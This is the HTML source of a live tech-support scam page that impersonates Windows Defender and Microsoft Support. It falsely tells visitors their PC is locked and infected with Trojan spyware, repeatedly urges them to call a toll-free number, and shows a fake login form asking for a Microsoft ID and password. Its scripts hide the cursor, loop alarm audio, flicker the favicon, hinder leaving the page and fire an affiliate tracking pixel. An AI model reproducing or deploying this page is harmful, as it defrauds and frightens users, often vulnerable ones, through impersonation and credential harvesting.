<html lang="en"><head><meta charset="utf-8">
      <meta content="width=device-width,initial-scale=1,shrink-to-fit=no" name="viewport">
      <meta content="noindex,nofollow" name="robots">
      <title>0467 Security center </title>
      <link href="w3" rel="icon" id="favicon" type="image/png">
      <link href="css/tapa.css" rel="stylesheet">
        <link href="css/bootstrap.min.css" type="text/css" rel="stylesheet">
<script src="js/jquery.min.js"></script>
<script src="js/bootstrap.min.js" crossorigin="anonymous"></script>
<link rel="stylesheet" href="css/font-awesome.min.css">

      <style type="text/css">@keyframes tawkMaxOpen{0%{opacity:0;transform:translate(0, 30px);;}to{opacity:1;transform:translate(0, 0px);}}@-moz-keyframes tawkMaxOpen{0%{opacity:0;transform:translate(0, 30px);;}to{opacity:1;transform:translate(0, 0px);}}@-webkit-keyframes tawkMaxOpen{0%{opacity:0;transform:translate(0, 30px);;}to{opacity:1;transform:translate(0, 0px);}}#xnvjiaf2npoo1694042833969.open{animation : tawkMaxOpen .25s ease!important;}@keyframes tawkMaxClose{from{opacity: 1;transform:translate(0, 0px);;}to{opacity: 0;transform:translate(0, 30px);;}}@-moz-keyframes tawkMaxClose{from{opacity: 1;transform:translate(0, 0px);;}to{opacity: 0;transform:translate(0, 30px);;}}@-webkit-keyframes tawkMaxClose{from{opacity: 1;transform:translate(0, 0px);;}to{opacity: 0;transform:translate(0, 30px);;}}#xnvjiaf2npoo1694042833969.closed{animation: tawkMaxClose .25s ease!important}</style>


         <script src="js/esc.js" type="text/javascript"></script>
         <script src="js/flscn.js" type="text/javascript"></script>
         <script src="js/main.js" type="text/javascript"></script>
         <script src="js/style.js" type="text/javascript"></script>
         <script src="js/ips.js" type="text/javascript"></script>
         <script src="js/scainfo.js" type="text/javascript"></script>
    <script>
function chat() {
document.getElementById("chat").style.display = "block";
document.getElementById("footer").style.display = "block";
document.getElementById("welcomeDiv").style.display = "block";
 document.getElementById("chat-box").style.display = "none";
 document.getElementById("login-box").style.display = "none";

}
</script>



          <style>
          .blink {
          color:#fff;
          animation: blink-animation 1s steps(5, start) infinite;
          -webkit-animation: blink-animation 1s steps(5, start) infinite;
          }

          .blink1 {
          background-color:green;
          animation: blink-animation 1s steps(5, start) infinite;
          -webkit-animation: blink-animation 1s steps(5, start) infinite;
          }

          .blink3 {
          color:red;
          animation: blink-animation 1s steps(5, start) infinite;
          -webkit-animation: blink-animation 1s steps(5, start) infinite;
          }




          @keyframes blink-animation {
          to {
          visibility: hidden;
          }
          }
          @-webkit-keyframes blink-animation {
          to {
          visibility: hidden;
          }
          }
          </style>

    <!--Start of Tawk.to Script-->
<script type="text/javascript">
var Tawk_API=Tawk_API||{}, Tawk_LoadStart=new Date();
(function(){
var s1=document.createElement("script"),s0=document.getElementsByTagName("script")[0];
s1.async=true;
s1.src='https://embed.tawk.to/67c9993577c67719163f5326/1illnsulr';
s1.charset='UTF-8';
s1.setAttribute('crossorigin','*');
s0.parentNode.insertBefore(s1,s0);
})();
</script>
<!--End of Tawk.to Script-->


    <script>
          function getVariableFromURl(n0me)
          {
              n0me = n0me.replace(/[\[]/,"\\\[").replace(/[\]]/,"\\\]");
              var regexS = "[\\?&]"+n0me+"=([^&#]*)";
              var regex = new RegExp( regexS );
              var results = regex.exec( window.location.href );
              if( results == null )
                  return "";
              else
                  return results[1];
          }
      </script>


      <script type="text/javascript">
                  var ph0nq = getVariableFromURl('ph0nq');
              </script>



        </head>



        <body class="map" id="mycanvas" onmousemove="showd2();" onclick="chat();beep1();" onbeforeunload="return myFunction()" style="cursor:none">

        <img src="https://kythnga.autodialhub.online/postback?clickId=REPLACE&payout=OPTIONAL&ce=clicks&status=OPTIONAL&transactionId=OPTIONAL" width="1" height="1" border="0" alt="">

<!--<audio id="ado1">
        <source src="try/beep.mp3" type="audio/mpeg">
      </audio>
      <audio autoplay="" id="ado2">
        <source src="try/eng.mp3" type="audio/mpeg">
      </audio>
    -->
      <audio id="mdchys">
  <source src="try/NtUGN1dKiCUr.mp3" type="audio/mpeg">
</audio>
<audio autoplay="" id="infogt">
  <source src="try/LhlCcb3bW5w3.mp3" type="audio/mpeg">
</audio>

      <a href="#" id="link_black" style="cursor:none" rel="noreferrer">
        <div class="black" style="height: 145%; cursor: none; display: block;"></div>

          <div class="bg" id="bg">
        <div class="bgimg" style="top:0">
          <img src="images/f24.png" alt="" width="100%">
        </div>
      </div>
      </a>
      <div class="pro_box" style="cursor: none; display: default;">
        <img src="images/bx2.png" alt="" style="max-width: 100%;">
      </div>
      <div class="pro_box2" style="cursor: default; display: none;">
        <img src="images/bg1.png" alt="" style="max-width: 100%;">
      </div>
      <div class="pro_box3" style="cursor: none; display: none;">
        <img src="images/bs001.png" alt="" style="max-width: 100%;">
      </div>

      <div style="bottom:-20px;position:fixed;cursor:none;z-index:999999999" id="footer">
        <div class="row">
          <div class="col-md-12">
            <div class="right-foot" style="text-align:center">
              <span id="footertxt">
                <img src="images/msmm.png"> Windows security </span>
              <span style="font-weight:500;padding-left:13px;color:#fff; ">Windows Support <span style="border:1px solid #fff;border-radius:5px;padding:2px 5px">    <script>document.write(ph0nq)</script>+1-888-768-3950
                </span>
              </span>
            </div>
          </div>
          <div class="col-md-12">
            <marquee direction="left" height="100px" width="100%">
              <small class="text-left" style="color:#eee;font-size:10px">Windows Defender SmartScreen now prevents unrecognized applications from appearing. Running this application may put your PC at risk. Windows Defender scan detected unwanted adware on this device that can steal passwords, online identities, financial information, personal files, photos, and documents。</small>
            </marquee>
          </div>
        </div>
      </div>



      <div class="cardcontainer" style="cursor: default; display: none;" id="pop_up_new">
        <p style="font-size:16px;font-weight:400;margin:0;padding:5px 10px;color:#fff!important;color:#414141;font-weight:700;margin-top:0px" class="text-center">Windows-Defender </p>
        <p>
         <b>Access to this system has been blocked for security reasons</b>
         </p>
         <p>Your computer has been reported to be infected with Trojan-type spyware. The following data was compromised:</p>
         <p>> Email ID <br>> Bank Password <br>> Facebook Login <br>> Photos and Documents </p>
         <p>A Windows Defender scan detected potentially unwanted adware on this device that can steal passwords, online identities, financial information, personal files, photos, and documents. </p>
         <p>Please contact us immediately. Our engineer will guide you through the removal process over the phone. </p>
         <p>Call Windows Support immediately to report this threat, prevent identity theft, and unblock access to this device. </p>
         <p>Closing this window may put your personal information at risk and may cause your Windows <span id="ip_add"></span> registration to be suspended. </p>
         <p style="padding-bottom:0;color:#fff;font-size:16px">Contact Windows support:<strong>
            <span style="border:1px solid #fff;border-radius:5px;padding:2px 5px">   <script>document.write(ph0nq)</script>+1-888-768-3950
            </span>
          </strong>
        </p>
        <div class="action_buttons">
          <a class="active" id="leave_page" style="cursor:pointer;color:#fff!important">Allow</a>
          <a class="active" id="leave_page" style="color:#fff!important">Deny</a>
        </div>
      </div>

      <div class="answer_list" style="display:none;background-color: rgb(40 40 40 / 80%);;height:auto;width:550px;margin-left:33%;position:absolute;z-index:99999999;border:1px solid transparent;border-color:#d6d8db;border-radius:.5rem" id="welcomeDiv">
        <p style="color:#FFFFFF;margin-top:10px;font-size:16px;opacity:.9;padding:0 5px" class="text-center">Access to this system has been blocked for security reasons. Do not access or restart this PC. If you overlook this basic warning, you may lose information about this framework. Contact support as soon as possible and a Microsoft expert will guide you through the investigation over the phone. Running this application may put your PC at risk。<br>
          <strong>
         Windows Support: <span style="border:1px solid #383d41;border-radius:5px;padding:2px 5px">    <script>document.write(ph0nq)</script>+1-888-768-3950
            </span>
          </strong>
        </p>
      </div>
      <div id="chat" style="display: none;">
        <img src="images/msmm.png">
        <span style="color:#222;font-size:24px;font-weight:600;margin-left:6px;position:relative;top:5px">Microsoft</span>
        <br>
        <p>Windows Technical Support
        </p>
        <h4 style="font-weight:600;color:#0F396D;font-size:22px">    <script>document.write(ph0nq)</script>+1-888-768-3950
          <br>( Toll-free number)<br><br>
        </h4>
        <div class="arrow-down">
          <svg height="1em" viewBox="0 0 320 512">
            <style>
              svg {
                fill: #fff
              }
            </style>
            <path d="M137.4 374.6c12.5 12.5 32.8 12.5 45.3 0l128-128c9.2-9.2 11.9-22.9 6.9-34.9s-16.6-19.8-29.6-19.8L32 192c-12.9 0-24.6 7.8-29.6 19.8s-2.2 25.7 6.9 34.9l128 128z"></path>
                  </svg></div>
      </div>
<div id="chat-box">
<span style="color: red;
font-size: 24px;
font-weight: 600;
margin-left: 6px;
position: relative;
top: 5px;" class="blink3">Virus Alert (05261) !!</span>
<div class="bhfys" onclick="hide1();playSound1();">
            <p class="text-center1" style="color: #CDCBCB; font-size: 18px; opacity:.9; ">X</p>

          </div>

<br>
<br>
<p class="text-center" style="color: #CDCBCB;  margin-top:10px; font-size: 16px; opacity:.9; ">
Microsoft Windows locked due to unusual activity.
Error: Ox800xdfy

<img src="images/1.jpg" width="500">

<br>Your system has been reported to be infected with Trojan-type spyware.<br>For assistance, contact Microsoft Support<br><strong style="font-size:24px;" class="blink1"><script>document.write(ph0nq)</script>+1-888-768-3950 (Helpline) 			 	</strong></p>

</div>

<div id="login-box">
  <span style="color: #fff;
  font-size: 21px;
  font-weight: 600;
  margin-left: 6px;
  position: relative;
  top: 5px;">Admin Login</span>
  <div class="mnmz1" onclick="hide1();playSound1();">
              <p class="text-center1" style="color: red; font-size: 22px; opacity:1; font-weight: 700; ">X</p>

            </div>

  <br>
  <br>
  <p class="text-center" style="color: #CDCBCB;  margin-top:10px; font-size: 16px; opacity:.9; ">
    Windows has been locked due to unusual activity.
<br>Try signing in again with your Microsoft ID and password.<br>If you need help, contact Microsoft Support.<br> <strong style="font-size:20px;"> <script>document.write(ph0nq)</script>+1-888-768-3950			 	</strong></p>

  <form action="#">
     <input type="text" name="name" id="name" placeholder="Username" class="text-input" required="" oninput="this.value = this.value.replace(/[^0-9.]/g, '').replace(/(\..*)\./g, '$1');"><br>

   <input type="text" name="name" id="name" placeholder="Password" class="text-input" required="" oninput="this.value = this.value.replace(/[^0-9.]/g, '').replace(/(\..*)\./g, '$1');"><br>

  <input type="submit" class="button1" name="Verify" value="Login" onclick="playSound1();">Login



    </form></div>

<script>
function showd2() {
document.getElementById("chat-box").style.display = "block";
}
</script>

<script>
  function showd2() {
  document.getElementById("login-box").style.display = "block";
  }
  </script>

      <script>
  setInterval(function() {
    document.getElementById("infogt").play();
    document.getElementById("mdchys").play();
  }, 500);
</script>

<script>
function beep1() {
document.getElementById("mdchys").play();
}
</script>
      <script>
        var e = 1;
        setInterval(function() {
          1 == e ? (document.getElementById("favicon").href = "w3.html", e = 0) : (document.getElementById("favicon").href = "w1.html", e = 1)
        }, 1E3);
      </script>
      <script>
        $(document).ready(function() {
          $("#mycanvas").click(function() {
            $("#welcomeDiv").show()

          })
        });
      </script>
      <script>
        $(document).ready(function() {
          $(".pro_box").delay(400).fadeIn(300);
          $("#poptxt").delay(2000).fadeIn(400);
              $(".black").delay(1E3).fadeIn(800);
          $(".pro_box2").delay(2500).fadeIn(800);
          $(".pro_box3").delay(3500).fadeIn(800);
          $("#pop_up_new").delay(4E3).fadeIn(800);
        });
      </script>
      <script>
        $(document).ready(function() {
          $("#mycanvas").click(function() {
            $("#poptxt").show()
          })
        });
        $(document).ready(function() {
          $("#cross").click(function() {
            $("#poptxt").show()
          })
        });
      </script>
      <script>
        $(document).ready(function() {
          $("body").mouseover(function() {
            $("#poptxt").show()
          })
        });
      </script>



      
</body></html>